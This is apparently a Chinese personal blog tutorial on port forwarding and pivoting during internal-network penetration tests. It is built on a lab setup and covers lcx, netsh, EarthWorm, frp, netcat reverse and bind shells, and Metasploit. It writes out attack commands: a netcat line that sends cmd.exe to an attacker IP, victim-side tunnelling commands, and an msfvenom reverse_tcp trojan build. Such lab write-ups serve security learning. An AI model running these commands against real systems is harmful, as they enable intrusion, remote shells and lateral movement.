十三の博客
0%

内网渗透端口转发总结

发表于 更新于 分类于

内网渗透端口转发总结

前言:之前渗透的时候,用些工具都是模模糊糊的,这次看到个不错的文章,想一次性解决这个问题。

(100条消息) VMware LAN区段网络设置_墨笔夺魂的博客-CSDN博客_lan区段

(100条消息) VMware虚拟机网卡LAN区段模拟内网_自然之龙的博客-CSDN博客_lan区段

windows版lcx介绍

img

环境如上,当然不是和他一样的,内网机是192.168.0.127

image-20220912141223474

外面ping不通,里面可以ping通。已模拟内网环境,他妈的我搭靶场的时候怎么就没有想到用这个lan网段。o(╥﹏╥)o

1
2
3
受害机执行
lcx.exe -slave 192.168.112.1 5333 172.16.1.2 3389
表将内网机(172.16.1.2:3389)转发到攻击机(192.168.112.1:5333)
1
2
攻击机执行
lcx.exe -listen 5333 5555,表将“监听到5333端口的流量”转发至5555端口上。

最后在攻击机上登录,本机ip:5555

netsh端口映射

这个只是把本机的某个端口映射到另外一个ip地址上面,只要访问本机的这个端口就可以了。但是访问外网ip是没得办法直接连的。

1
2
3
netsh interface portproxy add v4tov4 listenport=7777 connectaddress=192.168.112.144 connectport=3389

netsh interface portproxy show all

img

image-20220912151949136

1
2
3
netsh interface portproxy reset //删除端口转发

netsh interface portproxy show all

EarthWorm

内网穿透神器EarthWorm(EW),功能强大的网络穿透工具,具有socks5代理、端口转发,端口映射三大功能

image-20220912152035101

正向socks v5

image-20220912152223873

image-20220912152524235

大概就是这样喵

1
2
win7上执行:ew_win32.exe -s lcx_tran -l 1080 -f 172.16.1.3 -g 3389
解释:将172.16.1.3:3389代理到win7的1080端口。

然后攻击机访问win7的1080端口就可以实现代理喵。

image-20220912152715252

反向socks v5+proxifier

img

1
2
3
物理机执行
ew_win32.exe -s rcsocks -l 1080 -e 8888
监听1080端口,并接收8888端口的流量。
1
2
3
跳板机执行
ew_win32.exe -s rssocks -d 192.168.100.1 -e 8888
跳板机作为ssocks,和物理机8888建立连接。

proxifier配置代理服务器为127.0.0.1:1080

image-20220912153327767

这样就可以直接连接到内网的机器了

image-20220912153359153

要是代理关掉就连不上了

image-20220912153436429

二级内网穿透

这个我就没有复现了。暂时用不到。

lcx_tran用法

1653018640_628710106ca3f5c0288ce.png!small?1653018641846

1653018649_628710191786de1f5e152.png!small?1653018650516

1653018658_62871022bd4575a4b753e.png!small?1653018660246

1653018681_62871039bf0b8f0c15f66.png

1653018689_628710412b40868d11805.png!small?1653018690778

1653018695_6287104763d6d348a47ca.png!small?1653018696848

1653018705_6287105155d0356bda8cf.png!small?1653018706836

lcx_listen lcx_slave

1653018724_6287106447d70c9f97d12.png!small?1653018725702

win10:ew_win32.exe -s lcx_listen -l 1080 -e 8888

2-win2012:ew_win32.exe -s ssocksd -l 9999

1-win2012:ew_win32.exe -s lcx_slave -d 192.168.112.1 -e 8888 -f 172.16.1.6 -g 9999

1653018754_6287108299050b3e2e219.png!small?1653018756085

1653018776_6287109840a9e8608c92f.png!small?1653018777711

1653018786_628710a245549999e8536.png!small?1653018787769

1653018799_628710af95311c82220c0.png!small?1653018801224

1653018808_628710b88e21cba662216.png!small?1653018810152

1653018824_628710c8a059170b5f4c7.png!small?1653018826062

1653018836_628710d43ce65782870ca.png!small?1653018837769

netcat

反向连接

1653018870_628710f68444bc378f0f9.png!small?1653018871952

也就是弹个shell过来

1
2
攻击机先监听
nc64.exe -lvp 12345
1
2
受害者
nc64.exe -e cmd.exe 172.16.1.5 12345

image-20220912160159331

成功

正向连接

1
2
受害者
nc64.exe -lvp 12345 -e cmd.exe
1
2
攻击者
nc64.exe 172.16.1.6 12345

image-20220912160436671

成功

frp内网穿透

这个也没复现了,偷别人的图

1653019015_628711872bcf8e6f9ba01.png!small?1653019016569

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
 frpc.ini配置文件

[common]

server_addr = 192.168.112.1

server_port = 7000

token = 123

[plugin_socks]

type = tcp

remote_port = 8899

plugin = socks5

1653019048_628711a8d2cb0a3f7ab07.png!small?1653019050293

1
2
3
4
5
6
7
8
9
frps.ini配置文件

[common]

bind_addr = 0.0.0.0

bind_port = 7000

token = 123

1653019070_628711be4ca61a1d94286.png!small?1653019071699

命令执行

先运行:frps.exe -c frps.ini

1653019107_628711e3822b0d0c5be10.png!small?1653019109087

再运行:frpc.exe -c frpc.ini

1653019133_628711fd95642caace23d.png!small?1653019134996

本机配代理Proxifier

1653019145_62871209d4269eaa510bb.png!small?1653019147326

远程连接测试成功

1653019156_628712147f144f722b79e.png!small?1653019157954

1653019166_6287121e510cc64335a13.png!small?1653019167788

MSF socks隧道代理

1653019182_6287122ec9cb3642487e4.png!small?1653019184228

假设已获取winserver2008的服务器权限,用msf做演示。

1
2
3
msf生成exe木马控winserver2008

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.190.129 LPORT=12345 -f exe > ./WinSer2008.exe

1653019218_62871252869d7b441dadb.png!small?1653019220085

1
2
3
4
5
6
7
8
9
10
11
msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.190.129

set LPORT 12345

run

1653019230_6287125e7d4f18a99d5e3.png!small?1653019232077

1
route

1653019264_6287128032b424f0dacb4.png!small?1653019266022

然后添加路由:run autoroute -s 172.16.1.0

1653019277_6287128ddeec5a1833d50.png!small?1653019279452

然后查看添加的路由:run autoroute -p

1653019301_628712a5cd1cee9b3e7fd.png!small?1653019303373

background

1653019328_628712c0c8e3eab8cc5f6.png!small?1653019330223

然后搜索可以做代理的模块,并使用它:

1
2
3
4
5
6
7
8
9
search socks_proxy

use auxiliary/server/socks_proxy

show options

set username admin

set password 123456

1653019364_628712e47a421d4f19b9b.png!small?1653019365960

1653019375_628712ef490fb48013c5a.png!small?1653019377272

1653019380_628712f4a2b2df36ba7a6.png!small

然后run

1653019410_62871312a890fc84de419.png!small?1653019412131

windows下proxifer测试。

1653019427_628713239297600f2ee97.png!small?1653019429047

1653019440_628713304156956afbbfb.png!small?1653019441799

1653019450_6287133a1a0081a59de2e.png!small?1653019451548

vi /etc/proxychains.conf

1653019478_62871356384770324c66b.png!small?1653019479666

1653019488_62871360e4ffdfe6d4efe.png!small?1653019490395

我这没复现成功啊,不知道原因,过程和原理都是对的。